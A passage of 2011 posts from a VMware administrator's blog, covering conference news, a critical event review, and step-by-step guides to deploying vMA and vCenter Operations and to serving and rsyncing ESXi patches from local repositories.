acquaintances! Since the entire vSoup crew is going across the pond, we’ll try to get some live vSoup recordings done during the event! The delegates will also be attending the VMunderground BPaaS (Beantown Party as a Service): Tech Field Day 6 Edition, so if you are in Boston on Thursday 9th of June, be sure to get a ticket and stop by and say hi! --- # Tech Field Day #6 - Delegate I Am URL: https://vNinja.net/news/tech-field-day-6-delegate-i-am/ Date: 2011-05-16 Author: christian Tags: fun, realworld, Tech Field Day, Virtualization A while ago I got a surprising email, stating the following: You could consider this a sincere compliment from the Gestalt IT community as your name was suggested and we think you are the kind of person we all would love to have as part of our community. This means you're independent-minded, technology-focused, community-oriented, and a thought leader in the area of IT infrastructure. Of course, this is pretty much hogwash, but nevertheless I’m extremely honored to be invited as a delegate for Tech Field Day #6 in Boston, Mass. Thankfully I have a very understanding employer (and wife!) that pretty much immediately gave the go ahead and let me take a few days off work to attend. Looking at the delegate list, it’s certain that I’ll be in extremely good company for the event, and there is a good chance we will be able to do some vSoup Live action while in Boston! Thank you Stephen Foskett and the rest of Gestalt IT community who voted me in as a delegate, I’m sure you’re as surprised as I am. Look out Boston, the Delegates They Are A-Coming! Links # Gestalt Tech Field Day – Boston 6/10 June by Mike Laverick vSoup Podcast & Tech Field Day 6 by Christopher Wells --- # VMworld 2011 Session Voting URL: https://vNinja.net/news/vmworld-2011-session-voting/ Date: 2011-05-09 Author: christian Tags: conference, Session, vmworld, Vote VMware has opened the public voting for the VMworld 2011 sessions. Personally I haven’t submitted anything, but I do see a lot of familiar names in the voting application. The voting is available to anyone who has a vmworld.com account, and the voting period is from May 9th to May 18th. The voting is global, which means a vote for a session counts as a vote for both VMworld US and VMworld EMEA as 80% of the selected sessions will occur at both events. You can vote on as many sessions as you like, but only one vote pr. session. There is a plethora of sessions, in fact there are 854 sessions to choose between! Thankfully VMware has included a search application that enables you to focus on your particular areas of interest and find sessions that fit. I’ve done my part and voted, and I must say that some of these sessions sound great! Some of the session submitters have done a very good job with titling their submissions, which certainly helps in identifying what sessions to vote on. I won’t go through my entire list of votes, but a couple of sessions caught my eye immediately: Session ID Title Presenters 2769 You Know You Must Deduplicate Your vSphere Backups but Which Approach is Best for You? Ian Blatchford, Product Manager, Hewlett Packard Doug Hazelman, Senior Director, Product Strategy, Veeam Software 3276 From Epicenter to vCenter: Surviving natural disasters with VMware SRM Christopher Wells, Systems Architect, TUV Rheinland Japan, Ltd 1603 How VMware's Products Are Like a Military Unit Jase McCarty, Sr. vSpecialist, EMC Corporation 1425 Ask the Expert vBloggers Duncan Epping, Principal Architect, VMware, Inc. Rick Scherer, Senior vSpecialist, EMC Corporation Frank Denneman, Consulting Architect, VMware, Inc. Scott Lowe, CTO, vSpecialist Team, EMC Corporation Chad Sakac, VP, VMware Technology Alliance, EMC Corporation 1623 Storage Superheavy Weight Smackdown 2011 Cody Bunch, Blogger, ProfessionalVMware.com Vaughn Stewart, Evangelist for Virtualization & Cloud Computing , NetApp Chad Sakac, VP, VMware Technology Alliance, EMC Corporation Mike Koponen, WW Solutions Marketing Manager, Hewlett Packard Eric Schott, Executive Director, Dell Inc. Goes to show that titling your submission properly really does make a difference. Go forth and vote! --- # vCenter Update Manager - A Feature Request URL: https://vNinja.net/virtualization/vcenter-update-manager-a-feature-request/ Date: 2011-04-22 Author: christian Tags: ESX, ESXi, Ops, vCenter, vCenter Update Manager, VMware Way back in August 24 2010 I wrote a post called vCenter Update Manager to lose it’s fat. I’m still very happy that VMware has decided to drop OS patching from the product, and I still mean that can only be a good thing. In fact, that article prompted Beth Pariseau Senior News Writer for searchservervirtualization.techtarget.com to call me when researching her VMware users eye changes to Update Manager article. I would like to expand a bit on the following quote from the article: Centralized management is fine, Mohn said, but he’d like to see satellite servers hang on to a local repository of patches, which can then be applied with a command from the central server ... As I work with small ROBO environments, which in many cases have low bandwidth available coupled with very high latency, using VMware Update Manager to update the sites is often not feasible. The sheer problem with installing the patches from a central HQ based repository, and the time it consumes and potential failure rates, makes it more practical to download the patches manually to a local vMA installation (possibly even replicated with rsync) and applying the patches to the host from a local repository. This also minimizes the hosts downtime when applying patches. What I would like to see added to VMware Update Manager is the ability to tell a remote host to apply patches, but from a local file repository. Using vMA for this is absolutely possible, but I can also see using local (to the host) NAS storage as the patch repository as another possibility. By using some DNS magic, it would even be possible to tell all remote vSphere hosts to fetch their updates from _\patchrepo\vmware_ (or something similar) and it would still be a local repository. VMware Update Manager could even handle the replication of the patches to the remote sites, but in general I’m in favor of using the existing underlying network infrastructure that’s already in place to move the patches from a central location to the remote locations. So, in short, all I’m asking is for a way to tell a central VMware Update Manager installation where the patches for a remote server is, and invoke the patching process from the central installation. Surely, that can’t be too much to ask for, can it? --- # Installing and running VMware Compliance Checker for vSphere URL: https://vNinja.net/news/installing-and-running-vmware-compliance-checker-for-vsphere/ Date: 2011-04-20 Author: christian Tags: Ops, Security, Software, VMware, Windows The first version of the new VMware Compliance Checker for vSphere tool is now available for download. VMware Compliance Checker for vSphere lets you scan your ESX and ESXi hosts for compliance with the VMware vSphere hardening guidelines to make sure your hosts are properly configured. It also lets you save and print your assessment results, so you can track your compliance level over time, or use them as documentation for internal audits. Installing VMware Compliance Checker for vSphere # After downloading the VMwareComplianceCheckerForvSphere.msi installing is done in a matter of seconds, using the all to familiar click Next to continue Windows installation routine. The tool is Windows only at this point. The tool is Java based, so the client machine you run it on needs to have it installed locally before you can use it. Running a Compliance Scan # Running a compliance scan is very easy. Start up VMware Compliance Checker for vSphere and point it towards either a ESX/ESXi host, or towards your vCenter installation. The tool runs for a while, and in the end you’ll be presented with a nice HTML based report highlighting all your compliance shortcomings! Impressions/Conclusion # VMware Compliance Checker for vSphere looks like it can be a valuable tool to add to your vAdmin tool-belt. In it’s first version it does a good job of identifying potential issues with your environment. As far as I can see, William Lam’s Perl based vSphere Security Hardening Report Script does more extensive checks for now. The vSphere Security Hardening Report Script also has a couple of other advantages, one being that it’s operating system agnostic (since it’s Perl based) another advantage is that since it’s written in a scripting language you can set up automated cron jobs that performs the scanning for you. As far as I can see the VMware tool is missing the ability to schedule scans, which is something I really hope VMware will add to it in the not to distant future. --- # vNinja enables HA URL: https://vNinja.net/news/vninja-enables-h/ Date: 2011-04-13 Author: christian Tags: Ed, fun, HA, News, vNinja I’m happy to announce that my fellow vSoup Podcast co-host Ed Czerwin is on board as blogger here on vNinja.net! This means that from now on you won’t just have to put up with the content of one virtualization admin, but two! As all good vAdmins know, two is better than one, and it’ so much easier to build HA solutions around! Welcome aboard Ed, glad to have you on! --- # VMware Forum 2011 Oslo URL: https://vNinja.net/news/vmware-forum-2011-oslo/ Date: 2011-04-08 Author: christian Tags: Yesterday I attended VMware Forum 2011 in Oslo (Norwegian). The venue and location at DogA - the Norwegian Centre for Design and Architecture was very nice, but sadly I must ask VMware who the intended audience for the VMware Forum event is? According to the invitation the audience target is: People that will benefit from attending VMware Forum 2011 include: CIO, CFO and General Managers Infrastructure and Datacenter Managers IT Managers and Directors Security Managers Systems Administrators Desktop, SOE Managers Application Managers, Application Administrators Application Developers IT Procurement Mangers Sadly I fail to see how the VMware Forum 2011 in Oslo would be very beneficial for existing VMware customers, at least not at a technical level. To me it seems like VMware Forum 2011 was more geared towards potential new customers that haven’t seen the benefits of virtualization yet, rather than being an even for existing customers who are already running their products in their production environments. To me this is a bit strange, since it’s very likely that all of the attendees are existing customers already! There were three “tracks” you could follow during the event, one of them mainly led by VMware employees, the other two were sponsor driven and as far as I could gather it was mostly marketing and not geared towards the more technical attendants of the event. Even the VMware led presentations were mostly marketing biased, and did not dive deep into any sort of real world scenarios where I as an existing vAdmin could get any real value out of it. Even with presenters like Vittorio Viarengo, VP of Desktop Products at VMware, VMware failed to bring anything significantly new to the table and the presentations pretty much all started with VMware explaining their vision of “The Cloud” and their customers “Journey to the Cloud” (private, public or hybrid). I don’t mind VMware evangelizing their cloud vision, and I fully expect them to, but as an attendee I don’t see why every presentation needs to start with the same slide deck explaining their three steps to the Holy Grail of Cloudification: IT Production ⇒ Business Production ⇒ IT as a Service # In the keynote, that’s fine, but why do I need to see that slide, and it’s explanation, in every other session too? I understand that VMware is delivering a message, but frankly doing it this way is somewhat insulting to someone who grasps the concept and got up at 05:00 am to catch a plane to attend the event. Perhaps I’m being overly critical, but VMware Forum 2011 did not meet my expectations by a long shot. Of course, meeting up with Lars Trøen (blog) and Vegard Sagbakken has a value on it’s own, but that’s not the primary reason I had for attending VMware Forum 2011. Next year, please include a “technical” track us existing vAdmins can follow and get some real value out of. Give us some real world use cases, presented by the clients themselves, highlighting some non-marketing/fluff based scenarios. Admins want the real deal, not cloudspeak. I did get one real thing out of the event however, and that is what Fusion IO and HP are doing with integration in their blades. You can read more of that over on Lars new site Core four. Fusion IO, HP Blades and VMware View sounds like VDI nirvana, even if Atea did bring a paperboard Donkey and Horse on stage with them while presenting. --- # Digital Ship Magazine April 2011 URL: https://vNinja.net/news/digital-ship-magazine-april-2011/ Date: 2011-04-01 Author: christian Tags: digital ship, Ops, Presentation Back in February 2011 I was invited, along with my IT Manager, to do a presentation at Digital Ship Scandinavia 2011. Digital Ship magazine has now published an article based on what we presented at the live event. As far as I can gather, based on the feedback both at the event and afterwards, the presentation was a success and now the Digital Ship Magazine for April 2011 includes a two page article based on the entire presentation. I was not aware that they would do this, if so I clearly would have changed the the misconceptions in the “For installation we use the VMware Hypervisor on Windows Server 2008 R2 and put a Virtual Machine on top of that” “quote”, since that is wrong on several levels. Other than that, the article highlights all the important take-away points from our presentation, so if you’re interested in managing and installing IT infrastructures on remote and floating locations, have a read! Download the Digital Ship Magazine April 2011, and have a look at page 10-13 for the article called “From ’lightly chaotic’ to strictly standardised - onboard networks”. --- # vSoup Episode #7 and VMware Podcast Directory URL: https://vNinja.net/news/vsoup-episode-7-and-vmware-podcast-directory/ Date: 2011-03-28 Author: christian Tags: Podcast, VMware, vSoup vSoup Episode #7 “Everything is better with Bacon” is now available for your listening “pleasure”. With Sean Clark as our guest, we get into quite a few topics like storage and SQL virtualization. Be sure to check it out! In related news, VMware has created a Virtualization Podcast directory over on the VMware Communities portal. Way to go John, hopefully the other podcasts will follow suite so we can have one common directory for all of us! --- # vNinja.net available also on vNinja.com URL: https://vNinja.net/news/vninja-net-available-also-on-vninja-com/ Date: 2011-03-21 Author: christian Tags: site, vNinja Thanks to the generosity of Todd Wright vNinja.net is now also available via vNinja.com. Todd came out of nowhere and offered to redirect his vNinja.com domain to vNinja.net, since he didn’t have time to do anything with it himself. I’m very grateful that Todd wanted to do this, and thanks to some quick Apache trickery .com now redirects to .net to make sure Google doesn’t find and penalize any double content. Thanks again Todd, it’s much appreciated! --- # Installing and configuring VMware vCenter Operations URL: https://vNinja.net/virtualization/installing-and-configuring-vmware-vcenter-operations/ Date: 2011-03-21 Author: christian Tags: Maintenance, Monitoring, Ops, realworld, vCenter, vCenter Operations, Virtualization, vSphere VMware vCenter Operations was released to the general public a week or so ago and is available for download right now. As usual you can download a 60 day trial, and get started immediately. Like other recent management utilities from VMware, vCenter Operations comes in the form of a .OVF template (like vCMA/vMA). Installing VMware vCenter Operations # Download VMware vCenter Operations and import by starting vCenter Client, navigate to the “File” menu and select “Deploy OVF template…” Browse to the download location, and find the “VMware-vcops-1.0.0.0-373027_OVF10.ova” file. Select it and click open. Click on “Next” and review the details. Hit “Next” once more, and click on “Accept” to accept the VMware EULA and enable the “Next” button. Specify the name and location of the VMware vCenter Operations VM, and click “Next” to continue. Now we get to select which host or cluster the VM should be deployed to. Make your choices, and click on “Next” Select your preferred resource pool, if you have any, and once again click “Next” Now select your preferred datastore, and guess what? We get to click “Next” one more time! Decide if you want a thin or thick provisioned VM, the default is thick but I went with thin provisioned in this particular setup. The last configuration item, for now, is to map the networks. Select your network mappings and click on “Next”. Review the final setup screen, and once you are satisfied that your settings are correct, click on “Finish” to start the OVF template import. The import starts, and after a few minutes it should be ready to go! Success! Time to start it up! Configuring VMware vCenter Operations # After the vCenter Operations VM has finished booting, it displays a little information screen showing the IP address and other tidbits of information. The most important piece of information right now is the DHCP assigned IP address. Make a note of that IP for later. To make sure we don’t run into problems with time synchronization we need to make sure that the vCenter Operations VM time is synchronized with the ESX host time. To do so, right click on the VMware vCenter Operations VM inside of the vCenter Client, select “Edit Settings”. Select the “Options” tab, and find the VMware Tools section. Find the “Synchronize guest time with host” option, and select it. Open the vCenter Operations web page in a browser, and log in. The default username/password for vCenter Operations is admin/admin Log in, and follow the directions on screen to change the default username/password. The new password must be at least 8 characters, and at least one digit and one character. Note: This also changes the root account password for the vCenter Operations VM. Next up is configuring the vCenter Operations connection to the vCenter. Fill out the vCenter Server information form, with information pertinent to your infrastructure. Note that the registration credentials needs to have administrator privileges on the vCenter Server. You can use the same credentials for both registration and collection, or you can differentiate them if required in your environment. Click on “Save”, and a test is performed to make sure that the information provided is correct. If registration is successful, a new popup appears explaining that you need to use the vSphere Client to assign the vCenter Operations licenses. Click on “Ok” and the vCenter Operations setup dashboard appears in your browser. Go back to your vCenter Client and navigate to the “Home” screen. You should now see the new “vCenter Operations” icon under “Solutions and Applications”. If it does not appear immediately, close the vCenter Client and restart it to have it pick up the installation. To install the vCenter Operations license, go to “Home” and find the “Licensing” icon. Click on it, and change the “View by:” option to “Asset” Right click on “vCenter Operations” and select “Change License Key” Select “Assign new license key to this solution”, click on “Enter Key…” and enter your license key and optionally a label for the key. Click on “_O_K” to return to the “Assign License” window, and click on “OK” again to install the license. Your license should now be installed and active. Go back to the vCenter Client “Home” screen and find the vCenter Operations icon under “Solutions and Applications”. Click on it, and vCenter Operations should already be active monitoring your infrastructure. Thats it! You now have VMware vCenter Operations running in your environment. For details on how it works and reports your operations refer to the VMware vCenter Operations official documentation. Eric Sloof has also posted a couple of great videos in his VMware vCenter Operations - Troubleshooting Workflow post that gives an in-depth overview of what VMware vCenter Operations is capable of doing. --- # vSphere iPad Client URL: https://vNinja.net/virtualization/vsphere-ipad-client/ Date: 2011-03-18 Author: christian Tags: fun, iPad, vCenter, Virtualization, VMware, vSphere, vSphere Client Like everyone else in the vUniverse, I’ve had a play with the very recently released free vSphere Client for iPad. Since everyone, and their mother, has already blogged and reviewed it I don’t see much value in me doing the same. What I can say though, is that the first impression is pretty great. It looks good, works well and might be one of the apps that finally gives me an actual use case for the iPad. The feature set of the client is pretty basic so far, but it does provide you with a quick overview of your environment. I do agree with Juan Manuel Rey / @jreypo’s thoughts in his tweet though: @h0bbel I'm not saying is no fun or cool but I believe a Linux or OS X client is more needed and of course more productive We do need a cross platform vCenter Client, hopefully the iPad client is a step in that direction. Considering that it uses the vCMA as it’s backend this might pave the way for other solutions using the same API to connect to VMware vCenter. VMware vSphere Client for iPad posts # VMware vSphere Client for iPad - Control your datacenter from the couch by Eric Sloof Free VMware vSphere Client for iPad Available by Jason Boche VMware vSphere client for iPad app released by Gregg Robertson vSphere Client for iPad – Another step forward in mobile administration by Arnim van Lieshout VMware vSphere client for iPad released too early by Gabrie van Zanten --- # Custom Dictionary Syncronization with Dropbox URL: https://vNinja.net/howto/custom-dictionary-syncronization-with-dropbox/ Date: 2011-03-13 Author: christian Tags: Dropbox, Microsoft Office, Productivity, Tips & Tricks In the last couple of weeks I’ve been using Microsoft Word 2010 a lot more than I’ve previously done, and at the same time I’ve been switching computers a lot making it somewhat of an annoyance that a lot of the words I use in my documents are not recognized and marked with a wiggly red line underneath it. If only there was a way to keep the custom dictionary synchronized between computers. And guess what? There is. To the cloud! Setting up custom dictionary synchronization between several computers is pretty easy to set up, at least if you have a Dropbox account. If you don’t, sign up now via this affiliate link to give me some extra space to play with at the same time. Find your existing custom.dic file. Custom.dic is the local file Microsoft Office keeps your custom additions to the standard dictionary in. Usually it’s located in C:\Users{username}\AppData\Roaming\Microsoft\UProof. Copy the file to a location within your Dropbox folder structure. I’ve chosen My Dropbox\Applications\Office I renamed the file to myCustom.dic to differenciate it from the local one, but that’s not required Configure Microsoft Word 2010 to use the Dropbox syncronized file by going to File -> Options - Proofing and clicking on the “Custom Dictionaries…” button. This brings up a new window where you can change your custom dictionary file location. Click on “Add” Browse to your Dropbox located custom.dic file and add it. Now you have two custom dictionaries selected. I normally opt for using just one to make sure I get all my additions synchronized. Do your changes, and click on “Ok” Repeat step 4 the different computers you use, and the custom dictionary will automatically sync between them. Of course, this requires that you have Dropbox installed as well. Close the “Word Options” window, and enjoy life with synchronized custom dictionaries in Microsoft Office 2011. --- # Using rsync to Distribute Patches to a Remote vMA URL: https://vNinja.net/virtualization/using-rsync-to-distribute-patches-to-remote-a-vma/ Date: 2011-03-08 Author: christian Tags: ESX, ESXi, Ops, rsync, vCLI, Virtual Appliance, vMA, VMware, vSphere I recently posted Using vMA as a local vSphere Patch Repository, where I outlined how you can use your vMA instances as local file repositories for updates. This post is a continuation of that concept, but this time I’ll take it a step further and utilize rsync to make sure my vMA instances all contain the same set of patches. Rsync is great for this, as it handles fast incremental file transfers, which is a real time and bandwidth saver in my particular scenario. So, the premise is that you have one central vMA instance, and one or more remote vMA instances that should pull updates from the centrally located one. Installing rsync in vMA # Sadly, rsync isn’t included in vMA by default. To get it installed, we need to edit some files inside of vMA. Since vMA is CentOS based, this means configuring yum repositories, and thankfully the brilliant William Lam over at virtuallyGhetto has already done the hard work for us. In his post named Automate Update Manager Operations using vSphere SDK for Perl + VIX + PowerCLI + PowerCLI VUM William explains which files to edit to create a valid repository configuration for installation of official packages directly from CentOS. Warning: Do this on your own risk, I have not checked but I think this will fall under the “unsupported” tab at VMware. Configuring YUM in vMA # These instructions are pretty much copied from Williams post, but added here for context: Creating the repository configuration file # To create the file, in the correct directory, run the followingf command: [vi-admin@vMA /]$ sudo vi /etc/yum.repos.d/centos-base.repo Password: Add the following lines to the repository file: [base] name=CentOS-5 - Base baseurl=http://mirror.centos.org/centos/5/os/x86_64/ gpgcheck=1 gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5 [update] name=CentOS-5 - Updates baseurl=http://mirror.centos.org/centos/5/updates/x86_64/ gpgcheck=1 gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5 Exit the vi editor by hitting esc and entering :wq and hit enter. That saves the file, and exits the editor. Installing rsync via yum # Now comes the easy part, actually installing rsync inside vMA. All you have to do, is to enter the following command: [vi-admin@vMA /]$ sudo yum -y install rsync The installation starts, and you should see output similar to the following: Loaded plugins: fastestmirror Loading mirror speeds from cached hostfile Setting up Install Process Parsing package install arguments Resolving Dependencies --> Running transaction check ---> Package rsync.x86_64 0:2.6.8-3.1 set to be updated --> Finished Dependency Resolution Dependencies Resolved ==================================================================================== Package Arch Version Repository Size ==================================================================================== Installing: rsync x86_64 2.6.8-3.1 base 235 k Transaction Summary ==================================================================================== Install 1 Package(s) Update 0 Package(s) Remove 0 Package(s) Total download size: 235 k Downloading Packages: rsync-2.6.8-3.1.x86_64.rp 100% |=========================| 235 kB 00:01 Running rpm_check_debug Running Transaction Test Finished Transaction Test Transaction Test Succeeded Running Transaction Installing : rsync [1/1] Installed: rsync.x86_64 0:2.6.8-3.1 Complete! [vi-admin@vMA /]$ And there it is, rsync installed inside vMA! Configuring rsync to fetch upgrades from central vMA # Now that we have rsync installed inside vMA, we need to configure it to fetch the updates from a central vMA instance. Rsync needs to be installed in both ends of the pipe, so if you haven’t already done so, configure your “master vMA” the same way as mentioned above. Now that “both ends” of the pipe has rsync installed, we can run it from “client vMA” to pull down all the files currently in the repository on the “master vMA”. [vi-admin@vMA /]$sudo rsync -r vi-admin@192.168.5.57:/var/www/html/repo/* /var/www.html/repo The authenticity of host '192.168.5.57 (192.168.5.57)' can't be established. RSA key fingerprint is 3f:af:7c:53:5a:15:47:56:b8:25:77:79:14:b2:f5:2f. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.5.57' (RSA) to the list of known hosts. vi-admin@192.168.5.57's password: [vi-admin@vMA /]$ The command runs for a while, and when it finished you should see that the current contents of the “master vMA” repository is now located in the “client vMA” repository as well: [vi-admin@vMA repo]$ ls -la total 210988 drwxr-xr-x 2 root root 4096 Mar 8 18:51 . drwxr-xr-x 4 root root 4096 Mar 8 18:50 .. -rw-r--r-- 1 root root 0 Mar 8 18:51 testfile -rw-r--r-- 1 root root 0 Mar 8 18:51 testfile1 -rw-r--r-- 1 root root 0 Mar 8 18:51 testfile2 -rw-r--r-- 1 root root 0 Mar 8 18:51 testfile3 -rw-r--r-- 1 root root 215820281 Jan 27 19:15 update-from-esxi4.1-4.1_update01.zip [vi-admin@vMA repo]$ Conclusion # There is a lot more you can do with rsync, like replication files both ways, controlling bandwidth usage, using ssh keys to avoid username/password prompts, something that is required if you want to fully automated this process. I will not cover that, at least not right now, so head over to the rsync site to read up on the documentation for more advanced use cases. Even if I’ve barely touched the features rsync provides, it is clear that this is a way for admins to centrally manage distribution of vSphere patches to remote locations, even if the bandwidth is low and the latency high. Rsync provides us with ways to overcome the patching issues that you might see in poorly networked environments, and it can certainly help vAdmins keeping their environments patched and current, and that has to be a good thing™ --- # Using vMA as a local vSphere Patch Repository URL: https://vNinja.net/virtualization/using-vma-as-a-local-vsphere-patch-repository/ Date: 2011-03-07 Author: christian Tags: ESX, ESXi, Ops, vCLI, Virtual Appliance, vMA, VMware, vSphere I like using http as the transport protocol when patching my vSphere hosts. It’s easy to use and in most cases immediately available over most networks. Since I want to use http as the transport, we need to make vMA work as a http server. Starting Apache inside vMA # Luckily, the Apache http daemon is installed, by default, in vMA and to utilize it all you have to do is to start it! Log on to vMA with your favorite SSH client and run the following command to start the Apache HTTP Daemon: [vi-admin@vMA /]$ sudo service httpd start Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName [ OK ] [vi-admin@vMA /]$ Never mind the error message it displays, for our purposes that’s not an issue and we can safely ignore it. By default the files served by Apache is located in /var/www/html, so we’ll head over there to create a new directory [vi-admin@vMA /]$ cd /var/www/html/ [vi-admin@vMA html]$ sudo mkdir repo We’ve now created the repo directory inside the Apache docroot. Now we need to add some patches to that directory, to make it available for the vihostupdate or esxupdate command we can use to patch our hosts. In my lab, I used the update-from-esxi4.1-4.1_update01 patch bundle from vmware.com To download the patch into the new repo directory created above, run the following commands: [vi-admin@vMA html]$ cd /var/www/html/repo/ [vi-admin@vMA repo]$ sudo wget https://hostupdate.vmware.com/software/VUM/OFFLINE/release-260-20110127-912579/update-from-esxi4.1-4.1_update01.zip Password: --15:34:32-- https://hostupdate.vmware.com/software/VUM/OFFLINE/release-260-20110127-912579/update-from-esxi4.1-4.1_update01.zip Resolving hostupdate.vmware.com... 88.221.164.7 Connecting to hostupdate.vmware.com|88.221.164.7|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 215820281 (206M) [application/zip] Saving to: `update-from-esxi4.1-4.1_update01.zip' 100%[===============================================================================================================>] 215,820,281 919K/s in 3m 54s 15:38:26 (901 KB/s) - `update-from-esxi4.1-4.1_update01.zip' saved [215820281/215820281] This downloads the patch bundle, using the wget command, to the current directory. Now, to make sure your downloaded patch bundle is available via the web server, open http://vMA-IP/repo/ and you should see the directory contents listed. Your browser should display something similar to this: Before patching a host, power off or migrate any virtual machines that are running on the host and place the host into maintenance mode. Scan host for update compatibility # [vi-admin@vMA repo]$ vihostupdate --server 10.0.100.20 --scan --bundle http://10.0.101.14/repo/update-from-esxi4.1-4.1_update01.zip Enter username: root Enter password: The bulletins which apply to but are not yet installed on this ESX host are listed. ---------Bulletin ID--------- ----------------Summary----------------- ESXi410-201101201-SG Updates the ESXi 4.1 firmware ESXi410-201101202-UG Updates the ESXi 4.1 VMware Tools ESXi410-201101223-UG 3w-9xxx: scsi driver for VMware ESXi ESXi410-201101224-UG vxge: net driver for VMware ESXi ESXi410-Update01 VMware ESXi 4.1 Complete Update 1 Install updates to host # [vi-admin@vMA repo]$ vihostupdate --server 10.0.100.20 --install --bundle http://10.0.101.14/repo/update-from-esxi4.1-4.1_update01.zip Enter username: root Enter password: Please wait patch installation is in progress ... The update completed successfully, but the system needs to be rebooted for the changes to be effective. [vi-admin@vMA repo]$ While the update runs, you can also follow it’s progress in the vSphere Client When the patch has completed, and the host has been rebooted you can run the scan command again to make sure all of the patches are installed and no longer required. Management # Now, downloading the patches this way for each vMA instance you have (especially if you have several remote sites) is not very effective. Sure, you could place a central repository at a central site and use that as your central update repository. In that scenario you might as well just use the VMware vCenter Update Manager and not have to manage your updates via vMA at all. In some cases though, you would want to have the remote hosts install their updates from a local repository. One such case might be if you have remote locations with low bandwidth/high latency links that you don’t want to stress with the update downloads. I’m investigating a possible solution for that as well, and I’ll post that as soon as I have working proof of concept up and running. Another thing to note, is that when you restart vMA the http service will be stopped again. If you want it to autostart each time vMA boots, issue the following command [vi-admin@vMA repo]$ sudo ntsysv Password: This brings up a screen where you can choose which daemons should start at boot time inside of vMA. Find httpd, select it and hit the OK button. The next time vMA boots, the Apache web server starts with it. --- # Installing vSphere Management Assistant (vMA) URL: https://vNinja.net/virtualization/installing-vsphere-management-assistant-vma/ Date: 2011-02-28 Author: christian Tags: ESX, ESXi, Ops, vCLI, Virtual Appliance, vMA, VMware, vSphere The vMA is a Virtual Appliance that you can download from VMware. It’s primary function is to enable command line based management of your ESX/ESXi systems. Basically this is a pre-packaged virtual machine that includes vCLI and the vSphere SDK for Perl, which means that you don’t have to build your own management VM or install these tools locally on a management station. vMA is in many regards seen as a replacement for the ESX Service Console which no longer is present in ESXi. Downloading vSphere Management Assistant (vMA) # Basically there are two methods you can use when deploying vMA. Download the .OVF file to your local machine and upload it to your ESX/ESXi host. This is useful if you have already downloaded the vMA appliance and plan on deploying it to several hosts/clusters. This saves you from downloading it several times, and you can even use PowerCLI to automate the deployment of vMA, but I’m not going into that scenario this time around. Deploy the .OVF file directly from vmware.com, via the vSphere Client, to your host. In this post, I’ll focus on how to deploy vMA using method 2 - Direct Deployment Direct Deployment of vMA # Start your vSphere Client and connect to your host or vCenter. Navigate to “File”, find and select the “Deploy OVF template” option This starts the OVF deployment wizard. In the “Deploy from a file or URL” text box, enter the following url: http://download3.vmware.com/software/vma/vMA-4.1.0.0-268837.ovf and click on “Next”. Note: This URL is valid at the point of writing, but might change at a later date when a new version is released by VMware. The URL is now validated, and you are presented with the OVF Template Details window, where you can review the settings defined in the OVF file. Click “Next” to view and accept the VMware EULA. After reading it throroughly click on “Accept” and then on “Next” again to continue Next up is the “Name and Location” screen, where you can customize the name of your vMA instance. If you are deploying the several vMA instances to the same host/vCenter, you will need to change this to prevent naming conflicts. After naming your vMA, click on “Next” again, and you’ll get presented with the “Disk Format” screen. Here you can select between thin provisioned or thick provisioned disks, for this installation I chose to change it to thin provisioned, but the default is thick provisioned disks. After making your selection, we once again click on “Next” and now we’re nearly there! Review the summary screen to make sure you have selected the right options and click on “Finish” to finally start the download and deployment of your vMA. The download starts, and a nice little progress window shows you how far along you are. Of course, the time it takes to deploy vMA this way is highly dependant on available bandwidth and download speeds. In this particular environment the download is estimated to take approximately 39 minutes. Tip: If you want to deploy vMA in this manner, to several hosts, you can place the downloadable vMA .OVF file on an accessible file share or http server and serve your local path or URL to your host via the vCenter Client as well. This is particularly useful in scenarios where your vCenter Client doesn’t have internet access or if you want to speed up deployment by downloading it only once, but without scripting it. Once the vMA has finished downloading and installing, it will pop up inside your vSphere Client on the host you deployed it to. vMA Initial Configuration # The first time you start vMA, it fires a configuration wizard to help you configure it. The wizard guides you through the network setup and setting the vi-admin user password. And there it is. Now you can use your favorite SSH client (Putty) to connect to the vMA, or by using the console in the vSphere Client. For details on using vMA and vCLI see the vSphere Management Assistant (vMA) site. You can even add ESX/ESXi and vMA to your Active Directory and use that as an authentication source, but I’ll leave that for another post on another day. --- # Passion in IT URL: https://vNinja.net/rant/passion-in-modern-it-organizations/ Date: 2011-02-20 Author: christian Tags: Community, Virtualization Bob Plankers, aka The Lone Sysadmin, has posted a series of posts on “the blame game” in modern IT organizations (Blame, Understanding Blame and Preventing Blame). Bob’s posts are most excellent, and well worth a thorough read. Feel free to head on over and read them now, this post will be waiting right here when you come back. Are you back yet? In fact, Bob’s excellent rants has inspired me to write my own! No, I’m not going to talk about blame in IT. I have another little pet peeve, and that’s passion. **Passion** (from the Ancient Greek verb πάσχω (paskho) meaning to suffer or to endure) is an emotion applied to a very strong feeling about a person or thing. Passion is an intense emotion compelling feeling, enthusiasm, or desire for something. The term is also often applied to a lively or eager interest in or admiration for a proposal, cause, or activity or love. Passion can be expressed as a feeling of unusual excitement, enthusiasm or compelling emotion towards a subject, idea, person, or object. A person is said to have a passion for something when he has a strong positive affinity for it. A love for something and a passion for something are often used synonymously. Source: [wikipedia](http://en.wikipedia.org/wiki/Passion_%28emotion%29) I’m a passionate guy, in just about every sense of the word. I’m passionate about my family and I go nuts when my favorite sports teams do well (those of you that follow my twitter stream will certainly recognize this!). But here is the kicker; I’m also very passionate about my work. Call it childish excitement or even misplaced enthusiasm, I don’t really care. I have a strong burning passion for doing whatever I can, within the limits of my current employer, to develop and manage the best IT infrastructure I possibly can. I’ve been like this for as long as I can remember, and it’s probably a genetic defect of some sorts, and that’s fine. I know it’s definitely fine with my employer too, but that does go without saying doesn’t it? Of course, this passion and commitment flows over into hours and hours of unpaid work, done on my spare time, but for now that’s a price I’m personally willing to pay. As long as I’m able to juggle all of this, and my family responsibilities, it makes me a very happy camper indeed. This sense of passion towards your professional being is something that has really attracted me to the general VMware Virtualization Community. People who are recognized as industry experts happily share their knowledge and get involved in lengthy discussions with us minions, without expecting anything back. This enables others to share of their knowledge and actually dare to share their own experiences and ask questions. There is no sense of non-sharing to protect their own status as experts, but rather an abundance friendly, helpful and generally awesome people who happily help you out if you just engage them. So, this is my thank you post to everyone in the wide, wide world of VMware virtualization. You all rock, and you fuel my passion with jet propellant. Ok, so I get play the blame game after all: **I’m blaming you lot for really igniting the 